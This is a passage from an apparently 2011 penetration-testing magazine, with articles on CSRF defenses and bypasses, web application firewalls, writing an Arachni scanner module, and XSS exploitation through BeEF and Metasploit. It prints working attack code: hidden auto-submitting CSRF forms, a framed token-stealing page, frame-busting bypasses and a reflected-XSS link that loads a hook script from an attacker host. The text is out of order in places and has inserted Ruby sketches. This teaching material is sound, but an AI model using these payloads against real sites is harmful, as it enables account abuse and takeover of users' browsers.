• https://www.owasp.org/index.php/XSS_%28Cross_Site_Scripting%29_Prevention_Cheat_Sheet
• http://beefproject.com
In simple words: it is when an evil website posts a new status to your Twitter account while your Twitter login session is still active.
CSRF Basics

A simple example of this is the following hidden HTML code inside the evil.com webpage:

<img src="http://twitter.com/home?status=evil.com"
style="display:none">
Many web developers use POST instead of GET requests to avoid this kind of a malicious attack. But this approach is useless, as shown by the following HTML code used to bypass that kind of a protection (Listing 1).
Useless Defenses

The following are the weak defenses:

• Only accept POST: this stops simple link-based attacks (IMG, frames, etc.), but hidden POST requests can be created within frames, scripts, etc.
• Referrer checking: some users prohibit referrers, so you cannot just require referrer headers. Techniques to selectively create HTTP requests without referrers exist.
• Requiring multi-step transactions: CSRF attacks can perform each step in order.
Defense

The approach used by many web developers is CAPTCHA systems and one-time tokens. CAPTCHA systems are widely used, but asking a user to fill in the text in the CAPTCHA image every time he submits a form might make users stop visiting your website. This is why web sites use one-time tokens. Unlike the CAPTCHA system, one-time tokens are unique values stored in a
Cross-site Request Forgery
IN-DEPTH ANALYSIS • CYBER GATES • 2011

Cross-Site Request Forgery (CSRF for short) is a web application vulnerability that allows a malicious website to send unauthorized requests to a vulnerable website using the current active session of its authorized users.
Listing 1: HTML code used to bypass protection

<div style="display:none">
<iframe name="hiddenFrame"></iframe>
<form name="Form" action="http://site.com/post.php"
      target="hiddenFrame"
      method="POST">
<input type="text" name="message" value="I like
www.evil.com" />
<input type="submit" />
</form>
<script>document.Form.submit()</script>
</div>
index.php (Victim website)

And the webpage which processes the request and stores the message only if the given token is correct:

post.php (Victim website)

In-depth Analysis

In-depth analysis shows that an attacker can use an advanced version of the framing method to perform the task and send POST requests without guessing the token. The following is a real scenario (Listing 4):

index.php (Evil website)
For security reasons, the same origin policy in browsers restricts browser-side programming languages such as JavaScript from accessing remote content, and the browser throws the following exception:

Permission denied to access property 'document'

var token = window.frames[0].document.forms['messageForm'].token.value;
A browser's settings are not hard to modify, so the best way to achieve web application security is to secure the web application itself.
Frame Busting

The best way to protect web applications against CSRF attacks is using FrameKillers with one-time tokens. FrameKillers are small pieces of JavaScript code used to protect web pages from being framed:
<script type="text/javascript">
if (top != self) top.location.replace(location);
</script>
It consists of a conditional statement and a counter-action statement.

Common conditional statements are the following:
if (top != self)
if (top.location != self.location)
if (top.location != location)
if (parent.frames.length > 0)
if (window != top)
if (window.top !== window.self)
if (window.self != window.top)
if (parent && parent != window)
if (parent && parent.frames && parent.frames.length > 0)
if ((self.parent && !(self.parent === self)) && (self.parent.frames.length != 0))
webpage form's hidden field and in a session at the same time, in order to compare them after the form is submitted.

Attempts to subvert one-time tokens usually rely on brute force attacks. Brute forcing one-time tokens is useful only if the mechanism is widely used by web developers. For example, the following PHP code:
<?php
$token = md5(uniqid(rand(), TRUE));
$_SESSION['token'] = $token;
?>
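For comparison, a hedged sketch in Ruby (our illustration, not part of the article's PHP stack): md5(uniqid(rand(), TRUE)) derives the token from the clock and a non-cryptographic PRNG, whereas a CSPRNG gives token material that cannot be narrowed down by guessing the generation time.

```ruby
require 'securerandom'

# A token drawn from the operating system's CSPRNG;
# 16 random bytes are rendered as 32 hexadecimal characters.
token = SecureRandom.hex(16)
```

Any unpredictable, per-form value stored server-side works for the scheme described above; the point is only that the source of randomness should not be guessable.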
Defense Using One-time Tokens

To understand better how this system works, let's take a look at a simple webpage which has a form with a one-time token (Listing 2).
Listing 2: Wrong token

<?php session_start(); ?>
<html>
<head>
<title>GOOD.COM</title>
</head>
<body>
<?php
$token = md5(uniqid(rand(), true));
$_SESSION['token'] = $token;
?>
<form name="messageForm" action="post.php" method="POST">
<input type="text" name="message">
<input type="submit" value="Post">
<input type="hidden" name="token" value="<?php echo $token; ?>">
</form>
</body>
</html>
Listing 3: Correct token

<?php
session_start();
if ($_SESSION['token'] == $_POST['token']) {
    $message = $_POST['message'];
    echo "<b>Message:</b><br>$message";
    $file = fopen("messages.txt", "a");
    fwrite($file, $message."\r\n");
    fclose($file);
} else {
    echo "Bad request";
}
?>
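The whole flow of Listings 2 and 3 can be sketched in Ruby, with a plain Hash standing in for the PHP session. This is a hedged sketch under our own names (issue_token, handle_post are not from the article), and it additionally consumes the token on use so that it is genuinely one-time.

```ruby
require 'securerandom'

session = {}

# Generate a token and store it in the session; the page would also
# embed it in the form's hidden field (as in Listing 2).
def issue_token(session)
  session[:token] = SecureRandom.hex(16)
end

# Accept the post only when the submitted token matches the stored
# one, and delete it so a second submission fails (as in Listing 3).
def handle_post(session, params)
  expected = session.delete(:token)
  return 'Bad request' unless expected && params[:token] == expected
  "Message: #{params[:message]}"
end

t = issue_token(session)
first  = handle_post(session, token: t, message: 'hello')  # accepted
replay = handle_post(session, token: t, message: 'hello')  # rejected
```

Consuming the token on first use is what defeats the replay that a framed, scripted submission would otherwise attempt.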
And common counter-action statements are these:

top.location = self.location
top.location.href = document.location.href
top.location.replace(self.location)
top.location.href = window.location.href
top.location.replace(document.location)
top.location.href = window.location.href
top.location.href = "URL"
document.write('')
top.location.replace(document.location)
top.location.replace('URL')
top.location.replace(window.location.href)
top.location.href = location.href
self.parent.location = document.location
parent.location.href = self.document.location
Different FrameKillers are used by web developers, and different techniques are used to bypass them.
Method 1

<script>
window.onbeforeunload = function() {
    return "Do you want to leave this page?";
}
</script>
<iframe src="http://www.good.com"></iframe>
Method 2
Using double framing:

<iframe src="second.html"></iframe>

second.html:

<iframe src="http://www.site.com"></iframe>
Best Practices

And the best example of a FrameKiller is the following:

<style> html { display: none; } </style>
<script>
if (self == top) {
    document.documentElement.style.display = 'block';
} else {
    top.location = self.location;
}
</script>
This protects the web application even if an attacker browses the webpage with JavaScript disabled in the browser.
SAMVEL GEVORGYAN
Founder & Managing Director, CYBER GATES
www.cybergates.am | samvel.gevorgyan@cybergates.am
Samvel Gevorgyan is Founder and Managing Director of CYBER GATES Information Security Consulting, Testing and Research Company and has over 5 years of experience working in the IT industry. He started his career as a web designer in 2006, then seriously began learning web programming and web security concepts, which allowed him to gain more knowledge in web design, web programming techniques and information security. All this experience contributed to Samvel's work ethics, for he started to pay attention to each line of code for good optimization and protection from different kinds of malicious attacks, such as XSS (Cross-Site Scripting), SQL Injection, CSRF (Cross-Site Request Forgery), etc. Thus Samvel has transformed his job to a higher level and is gradually becoming a more complete security professional.
References
• Cross-Site Request Forgery – http://www.owasp.org/index.php/Cross-Site_Request_Forgery_%28CSRF%29, http://projects.webappsec.org/w/page/13246919/Cross-Site-Request-Forgery
• Same Origin Policy
• FrameKiller (Frame Busting) – http://en.wikipedia.org/wiki/Framekiller, http://seclab.stanford.edu/websec/framebusting/framebust.pdf
Listing 4: Real scenario of the attack

<html>
<head>
<title>BAD.COM</title>
<script>
function submitForm() {
    var token = window.frames[0].document.forms['messageForm'].elements['token'].value;
    var myForm = document.myForm;
    myForm.token.value = token;
    myForm.submit();
}
</script>
</head>
<body onLoad="submitForm()">
<div style="display:none">
<iframe src="http://good.com/index.php"></iframe>
<form name="myForm" target="hidden" action="http://good.com/post.php" method="POST">
<input type="text" name="message" value="I like www.bad.com" />
<input type="hidden" name="token" value="" />
<input type="submit" value="Post" />
</form>
</div>
</body>
</html>
WEB APPLICATION CHECKING
They are currently being used by hackers on a grand scale as gateways into corporate networks. Web Application Firewalls (WAFs) make it a lot more difficult to penetrate networks.

In most commercial and non-commercial areas, the
internet has developed into an indispensable medium that offers users a huge number of interesting and important applications. Information procurement of any kind, buying services or products, but also bank transactions and virtual official errands can be conducted easily and comfortably from the screen. Waiting times are a thing of the past, and while we used to have to search laboriously for information, we now have search engines that deliver the results in a matter of seconds. And so browsers and the web today dominate the majority of daily procedures in both our private as well as working lives. In order to facilitate all of these processes, a broad range of applications is required that are provided more or less publicly. Their range extends from simple applications for searching for product information or forms up to complex systems for auctions, product orders, internet banking or processing quotations. They even control access to the company's own intranet.
A major reason for these rapid developments is the almost unlimited possibilities to simplify, accelerate and make business processes more productive. Most enterprises and public authorities also see the web as an opportunity to make enormous cost savings, benefit from additional competitive advantages and open up new business opportunities. This requires a growing number of – and more powerful – applications that provide the internet user with the required functions as fast and simply as possible.
Developers of such software programs are under enormous cost and time pressure. An increasing number of companies want to use the functionality of these so-called web applications for their business processes and offer their products, services and information as quickly as possible, simply and in a variety of ways. So guidelines for safe programming and release processes are usually not available, or they are not heeded. In the end this results in programming errors, because major security aspects are deliberately disregarded or are simply forgotten. The productive use usually follows soon after development, without developers having checked the security status of the web applications sufficiently.
Above all, the common practice of adapting tried and tested technologies for developing web applications is dangerous without having subjected them to prior security and qualification tests. In the belief that the existing network firewall would provide the required protection if possible weaknesses were to become apparent, those responsible unwittingly grant access to systems within the corporate boundaries. And thereby
First the Security Gate, then the Airplane
What needs to be heeded when checking web applications

Anyone developing a new software program will usually have an idea of the features and functions that the program should master. The subject of security is, however, often an afterthought. But with web applications the backlash comes quickly, because many are accessible to everyone worldwide.
professional software engineering was not necessarily at the top of the agenda. So web applications usually went into productive operation without any clear security standards. Their security standard was based solely on how the individual developers rated this aspect and how high their respective knowledge was.

The problem with more recent web applications: many offerings demand the integration of additional browser plug-ins and add-ons in order to facilitate the interaction in the first place, or to make it dynamic. These include, for example, Ajax and JavaScript. While the browser was originally only a passive tool for viewing web sites, it has now evolved into an autonomous, active element and has actually become a kind of operating system for the plug-ins and add-ons. But that makes the browser and its tools vulnerable. The attackers gain access to the browser via infected web applications, and as such to further systems and to their owners' or users' sensitive data.

Some assume that an unsecured web application cannot cause any damage as long as it does not conduct any security-relevant functions or provide any sensitive data. This is completely wrong; the opposite is the case. One single unsecured web application endangers the security of further systems that follow on, such as application or database servers. Equally wrong is the common misconception that the telecom providers' security services would protect the data. Providers are not responsible for a safe use of web applications, regardless of where they are hosted. Suppliers and operators of web applications are the ones who have the big responsibility here towards all those who use their applications, one which they often do not fulfill.
they disclose sensitive data and make processes vulnerable. But conventional protection systems do not guard against apparently legitimate connections that attackers build up via web applications.

As a result, critical business processes that seemed secure within the corporate perimeter are suddenly freely accessible on the web. Conventional security strategies such as network firewalls or Intrusion Prevention Systems are no longer expedient here. Particularly in association with the web, the security requirements for applications have a different focus and are much higher than for traditional network security. The requirements of service providers who conduct security checks on business-critical systems with penetration tests should then also be respectively higher.

While most companies in the meantime protect their networks to a relatively high standard, the hackers have long since moved on to a different playing field: they now take advantage of security loopholes in web applications. There are several reasons for this. Compared with the network level, you don't need to be highly skilled to use the internet. This not only makes it easier to use legitimately, but also encourages the malicious misuse of web applications. In addition, the internet also offers many possibilities for concealment and making actions anonymous. As a result, the risk for attackers remains relatively low, and so does the inhibition threshold for hackers.

Many web applications that are still active today were developed at a time when awareness of application security on the internet had not yet been raised. There were hardly any threat scenarios, because the attackers' focus was directed at the internal IT structure of the companies. In the first years of web usage in particular,
Figure 1: This model (based on Everett M. Rogers' adoption curve from "Diffusion of Innovations") shows a time lag between the adoption of new technology and the securing of the new technology. Both exhibit a similar Technology Adoption Lifecycle. There is an inflection point when a technology becomes widely enough accepted, and therefore economically relevant for hackers, resulting in a period of Peak Vulnerability. Bottom line: security is an afterthought.
Web Applications Under Fire

The security issues of web applications have not escaped the attackers, and they have been exploiting these shortcomings in IT environments for some time now. There are numerous attack scenarios with which they can obtain access to corporate data and processes, or even external systems, via web applications. For years now the major types have been:
• All injection attacks (such as SQL Injection, Command Injection, LDAP Injection, Script Injection, XPath Injection)
• Cross Site Scripting (XSS)
• Hidden Field Tampering
• Parameter Tampering
• Cookie Poisoning
• Buffer Overflow
• Forceful Browsing
• Unauthorized access to web servers
• Search Engine Poisoning
• Social Engineering
The only more recent trend: the attackers have recently started to combine the methods more often in order to obtain even higher success rates. And here it is no longer just the large corporations who are targeted, because they usually guard and conceal their systems better. Instead, an increasing number of smaller companies are now in the crossfire.

One Example

Attackers know that a certain commercial software program is widely used for shopping carts in online shops, and that the smaller companies rarely patch the weak points. They launch automated attacks in order to identify – with high efficiency – as many worthwhile targets as possible on the web. In this step they already gather the required data about the underlying software, the operating system or the database from web applications which give away information freely. The attackers then only have to evaluate this information. As such, they have an extensive basis for later targeted attacks.
How to Make a Web Application Secure
There are two ways of actually securing the data and processes that are connected to web applications. The first way would be to program each application absolutely error-free, under the required application conditions and security aspects, according to predefined guidelines. Companies would then have to bring the security of older web applications up to the required standards later.
However, this intention is generally doomed to failure from the outset, because the later integration of security functions into an existing application is in most cases not only difficult but, above all, expensive. One example: a program that until now has not processed its inputs and outputs via centralized interfaces is to be enhanced to allow the data to be checked. It is then not sufficient to just add new functions. The developers must start by precisely analyzing the program and then make deep inroads into its basic structures. This is not only tedious but also harbors the danger of making mistakes. Another example is programs that do not use more than the session attributes for authentication. In this case it is not straightforward to update the session ID after logging in, which makes the application susceptible to session fixation.
If existing web applications display weak spots – and the probability is relatively high – then it should be clarified whether it makes business sense to correct them. It should not be forgotten that other systems are put at risk by the unsecured application. A risk analysis can clarify whether and to what extent the problems must be resolved, or if further measures should be taken at the same time. Often, however, the original program developers are no longer available, and training new developers as well as analyzing the web application results in additional costs.
The situation is not much better with web applications that are developed from scratch. No software program ever went into productive operation free of errors or weak spots; the shortcomings are frequently uncovered only over time. And by this time, correcting the errors is once again time-consuming and expensive. In addition, the application cannot be deactivated during this period if it works as a sales driver or supports an important business process. Despite this, the demand for good code that sensibly combines effectiveness, functionality and security still has top priority: the more securely a web application is written, the less improvement work and the less complex the external security measures that have to be adopted.
The second approach, in addition to secure programming, is the general safeguarding of web applications with a special security system from the time they go into operation. Such security systems are called Web Application Firewalls (WAF) and safeguard the operation of web applications.
A WAF should protect web applications against attacks via the Hypertext Transfer Protocol (HTTP). As such, it represents a special case of Application-Level Firewalls (ALF) or Application-Level Gateways (ALG). In contrast with classic firewalls and Intrusion Detection
systems (IDS), a WAF checks the communications at the application level. Normally, the web application to be protected does not have to be changed.
Secure programming and WAFs are not contradictory but actually complement each other. By analogy with air traffic: it is without doubt important that the airplane (the application itself) is well serviced and safe. But even the perfect airplane can never replace the security gate at the airport (the Web Application Firewall), which, as the first security layer, considerably minimizes the risk of attacks on any weak spots.
After introducing a WAF it is still advisable to check the security functions, for example by means of penetration tests. These might reveal that the system can be abused for SQL injection by entering inverted commas. It would be a costly procedure to correct this error in the web application; if a WAF is deployed as a protective system, it can instead be configured to filter the inverted commas out of the data traffic. This simple example also shows that it is not sufficient to just position a WAF in front of the web application without an analysis: that would lead to misjudging the achieved security status. Filtering out special characters does not always prevent an attack based on the SQL injection principle. Additionally, system performance would suffer, as the security rules would have to be set as restrictively as possible in order to exclude all possible threats. In this context, too, penetration tests make an important contribution to increasing web application security.
WAF Functionality
A major advantage of WAFs is that one single system can close the security loopholes for several web applications. If they are run in redundant mode they can also perform load balancing in order to distribute data traffic better and increase the performance of the web applications. With content caching functions they reduce the load on the backend web servers, and via automated compression procedures they reduce the bandwidth requirements of the client browser.
In order to protect the web applications, the WAF filters the data flow between the browser and the web application. If an entry pattern emerges that is defined as invalid, the WAF interrupts the data transfer or reacts in a different, predefined way according to its configuration. If, for example, two parameters have been defined for a monitored entry form, the WAF can block all requests that contain three or more parameters. The length and the contents of parameters can also be checked this way. Many attacks can be prevented, or at least made more difficult, just by specifying general rules about parameter quality, such as maximum length, valid characters and the permitted value range.
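The parameter rules just described can be sketched as a small validator. This is a minimal illustration, not a real WAF rule language: the `/login` path, the parameter names and the limits are all assumptions made up for this sketch.

```ruby
# Hypothetical per-parameter rules for one monitored form: how many
# parameters it accepts and, for each one, a maximum length and a
# permitted character set.
RULES = {
  '/login' => {
    'user' => { max_len: 32, charset: /\A[a-zA-Z0-9_.-]*\z/ },
    'pass' => { max_len: 64, charset: /\A[[:print:]]*\z/ }
  }
}

# A request passes only if the form is known, it carries no more
# parameters than defined, and every value obeys its length and
# character-set rule.
def request_allowed?(path, params)
  rules = RULES[path]
  return false unless rules                  # unknown form: block
  return false if params.size > rules.size   # extra parameters: block
  params.all? do |name, value|
    rule = rules[name]
    rule && value.length <= rule[:max_len] && value.match?(rule[:charset])
  end
end
```

With these rules, a third parameter added to the login form, or a value containing quotes and spaces, is rejected before it ever reaches the application.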
Of course, an integrated XML firewall should also be standard these days, because more and more web applications are based on XML. This protects the web server from typical XML attacks such as nested elements or WSDL poisoning. A fully developed rule set for access rates, with finely adjustable policies, also eliminates the negative consequences of denial-of-service or brute-force attacks. Moreover, every file that is uploaded to the web application can represent a danger if it contains a virus, worm, Trojan or similar; a virus scanner integrated into the WAF checks every file before it is sent to the web application.
Figure 2 An overview of how a Web Application Firewall works
Several WAFs have the option of monitoring the data sent by the web server to the browser in such a way that they can learn its nature. These filters can then, to a certain extent, automatically prevent malicious code from reaching the browser if, for example, a web application does not sufficiently check the original data. Learning Mode is a profiling mode that indexes every URL and parameter in a stream of traffic in order to build a whitelist of acceptable URLs and parameters. In practice, however, a whitelist-only approach is quite cumbersome, requiring constant re-learning whenever the application changes; as a result, whitelist-only approaches quickly become outdated due to the constant tuning required to maintain the whitelist profiles. The contrary blacklist-only approach, on the other hand, offers attackers too many loopholes. Consequently, the ideal solution relies on a combination of both whitelisting and blacklisting. This can be made easy to use with templated negative security profiles (e.g. for standard applications like Outlook Web Access, SharePoint or Oracle applications), augmented by a whitelist for high-value sub-sections like an order entry page.
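The combined approach can be illustrated with a few lines of code. This is only a sketch of the idea: the `/order` path and both pattern lists are assumptions invented for the example, not patterns from any real WAF.

```ruby
# Hypothetical combined policy: a global blacklist of known attack
# patterns (negative profile) plus a strict whitelist that only
# applies to a high-value sub-section such as an order entry page.
BLACKLIST = [/<script/i, /union\s+select/i, %r{\.\./}]
ORDER_WHITELIST = /\A[a-zA-Z0-9 ,.'-]*\z/

def value_allowed?(path, value)
  return false if BLACKLIST.any? { |pat| value =~ pat }   # applied everywhere
  return value.match?(ORDER_WHITELIST) if path.start_with?('/order')
  true                                                    # elsewhere: blacklist only
end
```

Most of the site is protected by the templated blacklist alone, while the order pages additionally reject any character outside the narrow whitelist.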
To prevent a high number of false positives, some manufacturers provide an exception profiler. This flags to the administrator entries that possibly violate the policies but can still be categorized as legitimate based on an extensive heuristic analysis. At the same time, the exception profiler makes suggestions for exemption rules that prevent a similar false positive from being repeated.
Some WAFs provide different operating modes: Bridge Mode (as Bridge Path) or Proxy Mode (as One-Arm Proxy or Full Reverse Proxy). In Bridge Mode the WAF is used as an in-line bridge path and works with the same address for the virtual IP and the backend server. This configuration avoids changes to the existing network structure and as such can be integrated very easily and quickly to protect an endangered web application, but Bridge Mode deployments sacrifice security and application acceleration for network simplicity. Additionally, in this mode all data is passed on to the web application, including potential attacks – even if the security checks have been conducted.
The by far safer operating mode for a WAF is the Full Reverse Proxy configuration, as this is used in line and uses both of the system's physical ports (WAN and LAN). As a proxy, a WAF can protect web applications against attacks such as Session Spoofing or Cross-Site Request Forgery, which is not possible in Bridge Mode, and certain functions are only available in this mode. As a Full Reverse Proxy a WAF provides, for example, Instant SSL, which converts HTTP pages into HTTPS without changes to the code.
Proxy WAFs also provide a whole range of further security functions. They facilitate the translation of web addresses, rewriting the URLs used by public requests to the web application's hidden URLs; this means that the application's actual web address remains cloaked. With proxy WAFs, SSL is much faster and the response times of the web application can also be accelerated. They also facilitate cloaking techniques, Layer 7 rules (to mitigate denial-of-service attacks), as well as authentication and authorization. Cloaking, the concealment of one's
Figure 3 A Web Application Firewall should also protect the outgoing traffic to make data theft more difficult
own IT infrastructure, is the best way to evade the previously mentioned scan attacks which attackers use to seek out easy prey. Masking outgoing data protects against data theft, and cookie security prevents identity theft. But proxy WAFs, too, must be configured appropriately for the respective environment; penetration tests help with the correct configuration.
Demands on Penetration Testers
When penetration testers look for weak spots they should also take into account the Payment Card Industry Data Security Standard (PCI DSS) 2.0. This defines rules for transmitting and storing Primary Account Number (PAN) information. Companies are required to develop secure web applications and maintain them constantly. Further points define formal risk checks and test processes that are intended to uncover high-risk weak spots. In order to check whether systems comply with PCI DSS, penetration testers must heed the following requirements:
• Does the system have a Web Application Firewall?
• Does the web traffic occur via a WAF proxy function?
• Are the web servers shielded against direct access by attackers?
• Is there simple SSL encryption for the data traffic, even if the application or the server does not support this?
• Are all known and unknown threats blocked?
A further point is protection against data theft. This involves checking whether the protection mechanism inspects the outgoing data traffic for the possible withdrawal of sensitive data and then stops it.
Penetration testers can fall back on web scanners to run security checks on web applications. Several WAFs provide extra interfaces to automate such tests.
Since, by its very nature, a WAF stands on the front line, certain test criteria should be applied to it as well. These include, in particular, identity and access management. In this context the principle of least privilege applies: users are only awarded privileges on a need-to-have basis for their work or the use of the web application; all other privileges are blocked. A general integration of the WAF with Active Directory, eDirectory or other RADIUS- or LDAP-compatible authentication services makes this work easier.
The user interface is also an especially critical point, because it is the basis for safe WAF configuration. Unintelligible or poorly structured user interfaces lead to incorrect settings which cancel out the protective functions. If, by contrast, the functions can be grasped intuitively, are clearly displayed and easy to understand and to set, then in practice this makes the greatest contribution to system security. A further plus is a user interface which is identical across several of the manufacturer's products or, even better, a management center which administrators can use to manage numerous other network and security products as well as the WAF. The administrators can then rely on familiar settings processes for security clusters. This ensures that security configurations for each cluster are consistent across the organization. An extensive penetration test of web applications should therefore take the ergonomics of the WAF interface into account in the evaluation, along with the consistency of security deployment across applications and sites.
In summary, any web application, old or new, needs to be secured by a WAF in Full Proxy Mode. Penetration testers should check whether the WAF reliably cloaks system information in order to make attacks on the infrastructure less likely in the first place. They should also check whether it prevents the hacking of the application itself with common or new means, whether it secures all the backend systems the application connects to, and whether it stops leakage of sensitive data when the web application has weaknesses which the WAF cannot level out. If penetration testers are not only looking for a security snapshot but want to help their customers create sustainable security, they should always include the WAF's administration in their assessment.
OLIVER WAI
Oliver Wai leads product marketing for Barracuda's line of web application security and application delivery products. In his role, Oliver is a core member of Barracuda's security incident response team and writes frequently about the latest application security threats. Prior to Barracuda Networks, Oliver held positions at Google, Integration Appliance and Brocade Communications. Oliver has an MS in Management Science & Engineering from Stanford University and a BS (cum laude) in Computer Engineering from Santa Clara University.
In the upcoming issue of the magazine:
• Web Session Management
• Password management in code
• ETHical Ghosts on SF1
• Preservation, namely in the online gambling industry
• Cyber Security War
Available to download on December 22nd.
If you would like to contact the PenTest team, just send an email to en@pentestmag.com. We will reply as soon as possible.
WEB APP VULNERABILITIES
Create Your Own Module
Arachni is very modular and can be easily extended. In the following example we create a new reconnaissance module.
Move into your Arachni source tree; you'll find the modules directory. In there you'll find two directories: audit and recon. Move into the recon directory, where we will create our Ruby module.
Arachni makes it really easy: if your module needs external files, it will search a subdirectory with the same name. For example, if you create a svn_digger_dirs.rb module, this module is able to find external files in the modules/recon/svn_digger_dirs subdirectory.
Our new reconnaissance module will be based on the SVNDigger wordlists for forced browsing. These wordlists are based on directories found in open source code repositories.
If there is a directory that needs to be protected and you forgot to do so, it will be found by a scanner that uses these wordlists.
Furthermore, it can be used as a basis for reconnaissance: if a directory or file is detected, this might provide clues about what technology the site is using.
Download the wordlists from the above URL. Create a directory modules/recon/svn_digger_dirs and move the file all-dirs.txt from the wordlist archive to the newly created directory.
Create a copy of the file modules/recon/common_directories.rb and name it svn_digger_dirs.rb. Change the code to read as follows (Listing 3).
The code does not need a lot of explanation: it will check whether or not a specific directory exists; if yes, it will forward the name to the Arachni Trainer (which will include the directory in further scans) as well as create a report entry for it.
Note: the above code, as well as another module based on the SVNDigger wordlists with filenames, is now part of the experimental Arachni code base.
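The forced-browsing idea behind the module can be sketched in plain Ruby. Note this is NOT the actual Arachni module API (which subclasses Arachni's module base class); it is a standalone illustration of the core check, with an injectable `probe` lambda standing in for the real HTTP request so the logic can be exercised without a network.

```ruby
require 'net/http'
require 'uri'

# Try every directory from the wordlist against the target and keep
# those that do not answer 404 -- anything else (200, 301, 403...)
# is worth reporting and feeding back into the scan.
def forced_browse(base_url, wordlist, probe = nil)
  base = URI(base_url)
  wordlist.map(&:strip).reject(&:empty?).select do |dir|
    path = "/#{dir}/"
    status =
      if probe
        probe.call(path)   # injected for testing
      else
        Net::HTTP.get_response(base.hostname, path, base.port).code.to_i
      end
    status != 404
  end
end
```

In the real module, each hit would additionally be handed to the Trainer and logged as an issue, as described above.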
Conclusion
We used Arachni in many of our application vulnerability assessments. The good points are:
• Highly scalable architecture: just create more servers with dispatchers and share the load. This makes the scanner a lot more responsive and fast.
• Highly extensible: create your own modules, plug-ins and even reports with ease.
• User-friendly: start your scan in minutes.
• Very good XSS and SQLi detection with very few false positives. There are false negatives, but this is usually caused by Arachni not detecting the links to be audited. This weakness in the crawler can be partially offset by manually browsing the site with Arachni configured as a proxy.
• Excellent reporting capabilities, with links to additional information and also a reference to the standardised Common Weakness Enumeration (CWE).
Arachni lacks support for the following:

• No AJAX and JSON support
• No JavaScript support
This means that you need to help Arachni find links hidden in JavaScript, e.g. by using it as a proxy between your browser and the web application. You'll need a different tool (or use your brain and manual tests) to check for AJAX/JSON-related vulnerabilities in the application you are testing.
Arachni also cannot examine and decompile Flash components, but a lot of tools are at hand to help you with that. Arachni does not perform WAF (Web Application Firewall) evasion, but then again, this is not necessarily difficult to do manually for a skilled consultant or hacker.
And why not write your own module or plug-in that implements the missing functionality? Arachni is certainly a tool worth adding to your toolkit.
HERMAN STEVENS
After a career of 15 years spanning many roles (developer, security product trainer, information security consultant, Payment Card Industry auditor, application security consultant), Herman Stevens now works and lives in Singapore, where he is the director of his company Astyran Pte Ltd (http://www.astyran.com). Astyran specialises in application security, such as penetration tests, vulnerability assessments, secure code reviews, awareness training and security in the SDLC. Contact Herman through email (hermanstevens@gmail.com) or visit his blog (http://blog.astyran.sg).
In most commercial penetration testing reports it's sufficient to just show a small alert popup; this is to show that a particular parameter is vulnerable to an XSS attack. However, this is not how an attacker would operate in the real world. Sure, he'd use a popup initially to find out which parameter is vulnerable to an XSS attack. Once he's identified that, though, he'll look to steal information by executing malicious JavaScript, or even gain total control of the user's machine.
In this article we'll look at how an attacker can gain complete control over a user's browser, ultimately taking over the user's machine, by using BeEF (a browser exploitation framework).
A Simple POC
To start off, though, let's do exactly what the attacker would do, which is to identify a vulnerability. For simplicity's sake we'll assume that the attacker has already identified a vulnerable parameter on a page. Here are the relevant files, which you too can use on your web server if you want to try this:
HTML Page

<HTML>
<BODY>
<FORM NAME="test" action="search1.php" method="GET">
Search: <INPUT TYPE="text" name="search">
<INPUT TYPE="submit" name="Submit" value="Submit">
</FORM>
</BODY>
</HTML>
XSS, BeEF and Metasploit Exploitation
Figure 2 BeEF after configuration
Cross Site Scripting (XSS) is an attack in which an attacker exploits a vulnerability in application code and runs his own JavaScript code in the victim's browser. The impact of an XSS attack is limited only by the potency of the attacker's JavaScript code.
Figure 1 The user enters input in a search box
and click a few buttons to configure it. Alternatively, you could use a distribution like BackTrack, which already has BeEF installed. Here is a screenshot of how BeEF looks after it is configured (Figure 2).
Instead of clicking on a link which generates a popup box, the user will this time be tricked into clicking on a link which tells his browser to connect to the BeEF controller. The URL that the user has to click on is:
http://localhost/search1.php?search=<script src='http://192.168.56.101/beef/hook/beefmagic.js.php'></script>&Submit=Submit
The IP address here is the one on which you have BeEF running. Once the user clicks on the link above, you should see an entry in the BeEF controller window showing that a zombie has connected. You can see this in the Log section on the right-hand side or the Zombie section on the left-hand side. Here is a screenshot which shows that a browser has connected to the BeEF controller (Figure 3).
Click and highlight the zombie in the left pane and then click on Standard Modules – Alert Dialog. This will result in a little popup box appearing on the victim machine. Here's a screenshot which shows the same (Figure 4), and this is what the victim will see (Figure 5).
So, as you can see, because of BeEF even an unskilled attacker can run code which he does not even understand on the victim's machine and steal sensitive data. Hence it becomes all the more
Server Side PHP Code

<?php
$a = $_GET['search'];
echo "The parameter passed is $a";
?>
As you can see, it's some very simple code: the user enters something in a search box on the first page, his input is sent to the server, which reads the value of the parameter and prints it to the screen. So if, instead of simple text, the attacker enters a simple piece of JavaScript into the box, the JavaScript will execute on the user's machine and not get displayed. The user hence just has to be tricked into clicking on a link: http://localhost/search1.php?search=<script>alert(document.domain)</script>
The screenshot below clarifies the above steps (Figure 1)
BeEF – Hook the User's Browser
Now, while this example is sufficient to prove that the site is vulnerable to XSS, it's most certainly not where an attacker will stop. An attacker will use a tool like BeEF (Browser Exploitation Framework) to gain more control of the user's browser and machine.
I used an older version of BeEF (0.3.2), as I just wanted to demonstrate what you can do with such a tool; the newer version has been rewritten completely and has many more features. For now, though, extract BeEF from the tarball and copy it into your web server directory
Figure 3 Connection with BeeF controller
Figure 4 What the attacker will see
Figure 5 What the victim will see
Figure 6 Defacing the current Web Page
important to protect against XSS. We'll have a small section right at the end where I briefly tell you how to mitigate XSS.
I'll quickly discuss a few more examples using BeEF before we move on to using it as a platform for other attacks. Here are the screenshots for the same; these are all a result of clicking on the various modules available under the Standard Modules menu.
Defacing the Current Web Page
This results in the webpage being rewritten in the victim's browser with the text in the 'DEFACE STRING' box. Try it out (Figure 6).
Detect All Plugins in the User's Browser
There are plenty of other plug-ins inside BeEF, under the Standard Modules and Browser Modules tabs, which you can try out for yourself. I won't discuss all of them here, as the principle is the same. What I want to do now, though, is use the user's hooked browser to take complete control of the user's machine itself (Figure 7).
Integrate BeEF with Metasploit and Get a Shell
Edit BeEF's configuration files so that it can directly talk to Metasploit. All I had to edit was msf.php, to set the correct IP address. Once this is done, you can launch Metasploit's browser-based exploits from inside BeEF.
Figure 7 Detecting plugins in the user's browser
Figure 8 Starting Metasploit
Figure 9 The jobs command
Figure 10 Metasploit after clicking Send Now
Figure 11 Meterpreter window – screenshot 1
Figure 12 Meterpreter window – screenshot 2
Now, first ensure that the zombie is still connected. Then click on Standard Modules – Browser Exploit and configure the exploit as per the screenshot below; we're basically setting the variables needed by Metasploit for the exploit to succeed (Figure 8).
